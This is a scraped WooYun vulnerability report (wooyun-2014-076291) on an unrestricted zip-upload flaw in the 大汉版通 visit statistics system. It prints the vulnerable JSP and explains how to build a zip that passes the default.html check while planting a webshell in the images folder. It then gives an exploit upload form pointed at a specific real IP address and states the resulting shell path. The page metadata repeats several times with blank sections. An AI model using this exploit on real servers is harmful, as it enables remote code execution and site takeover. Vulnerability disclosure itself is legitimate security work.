大汉版通系统文件上传无限制getshell | wooyun-2014-076291| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076291

漏洞标题：大汉版通系统文件上传无限制getshell

漏洞作者：路人甲

提交时间：2014-09-17 12:55

修复时间：2014-12-13 12:56

公开时间：2014-12-13 12:56

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-17：细节已通知厂商并且等待厂商处理中
2014-09-19：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-11-13：细节向核心白帽子及相关领域专家公开
2014-11-23：细节向普通白帽子公开
2014-12-03：细节向实习白帽子公开
2014-12-13：细节向公众公开

简要描述：

虽然我知道在你们的概念里，所有的注入都认为只是一个漏洞
那好吧那我今晚就给你们再爆一个上传漏洞（目前该系统没有爆出过上传漏洞）,我就想看看你们是不是也像对待注入一样，把所有上传漏洞也都认为只是一个漏洞，：）

详细说明：

该系统为：网站群访问统计系统（VC）
存在漏洞的文件
/vc/vc/index/opr_upload.jsp
代码如下

if (filename != null) {
			//解压到临时目录
			ZipFile zf = new ZipFile();
			String upLoadName = Convert.replaceString(filename,".zip","");
			Convert.createDirectory(uploadDir + filename);
			zf.unzip(uploadDir + filename, uploadDir+upLoadName);
			//判断上传文件的合法性
			if (FileFunc.getFileState(uploadDir+upLoadName+ File.separator+ "default.html")
			&& FileFunc.getFileState(uploadDir+upLoadName+ File.separator+ "images" + File.separator)) {
				//判断default.html文件的合法性
				String temp = FileFunc.fileToString(uploadDir+upLoadName+ File.separator
				+ "default.html", "UTF-8");
				int startIndex = temp.indexOf("<!--beginunit name=索引 -->");
				int endIndex = temp.indexOf("<!--endunit -->");
				if (startIndex < 0 || endIndex < 0) {
					//删除upload下面的所有文件及目录
					FileFunc.delAllFile(uploadDir);
					out.println(Convert.getAlterScript("alert('上传的文件default.html不符合要求!');"));
				} else {
			//复制文件和目录
					FileFunc.copyFile(uploadDir+upLoadName+ File.separator
						+ "default.html", webidpath
						+ "default.html");
					FileFunc.copyFolder(uploadDir + upLoadName+ File.separator+ "images",
						webidpath + "images");
				}
			} else {
				out.println(Convert.getAlterScript("alert('上传包没有包含指定文件和目录!');"));
			}
			//删除上传的文件和目录
			//                       FileFunc.delAllFile(uploadDir);
		} else {
			out.println(Convert
			.getAlterScript("alert('获取上传文件名失败!');"));
		}

解压上传的ZIP文件到指定的目录，很容易的就可以想到打包木马文件为：ZIP 即可获取shell
但这段代码有一定的限制,需要我们去绕过，如下

if (FileFunc.getFileState(uploadDir+upLoadName+ File.separator+ "default.html")
			&& FileFunc.getFileState(uploadDir+upLoadName+ File.separator+ "images" + File.separator)) {
				//判断default.html文件的合法性
				String temp = FileFunc.fileToString(uploadDir+upLoadName+ File.separator
				+ "default.html", "UTF-8");
				int startIndex = temp.indexOf("<!--beginunit name=索引 -->");
				int endIndex = temp.indexOf("<!--endunit -->");
				if (startIndex < 0 || endIndex < 0) {
					//删除upload下面的所有文件及目录
					FileFunc.delAllFile(uploadDir);
					out.println(Convert.getAlterScript("alert('上传的文件default.html不符合要求!');"));
				} else {

压缩包中必需要有 default.html文件，且里面的内容要包含：
int startIndex = temp.indexOf("");
int endIndex = temp.indexOf("");
要不然就会出错，于是我们只要稍构造zip包即可实现无任何限制Getshell
构造的zip包如图：

images 文件夹中为我们的shell,default.html 中包含 、
于是我们构造以下Exp 便可直接获取shell

<form name="form1" method="post" action="http://123.129.207.166/vc/vc/index/opr_upload.jsp?webid=0" enctype="multipart/form-data">
  <input name="file" type="file" class="leftinput" size="50">
  <input type="submit" name="a" value="Upload"/>
</form>

保存为htm 便可直接上传任意文件，
解压的路径为：/vc/vc/html/upload/shell/images/文件名
成功后如图：

漏洞证明：

修复方案：

严格检查

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-13 12:56

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076291

漏洞标题：大汉版通系统文件上传无限制getshell

相关厂商：南京大汉网络有限公司

漏洞作者：路人甲

提交时间：2014-09-17 12:55

修复时间：2014-12-13 12:56

公开时间：2014-12-13 12:56

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076291

漏洞标题：大汉版通系统文件上传无限制getshell

相关厂商：南京大汉网络有限公司

漏洞作者： 路人甲

提交时间：2014-09-17 12:55

修复时间：2014-12-13 12:56

公开时间：2014-12-13 12:56

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076291"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云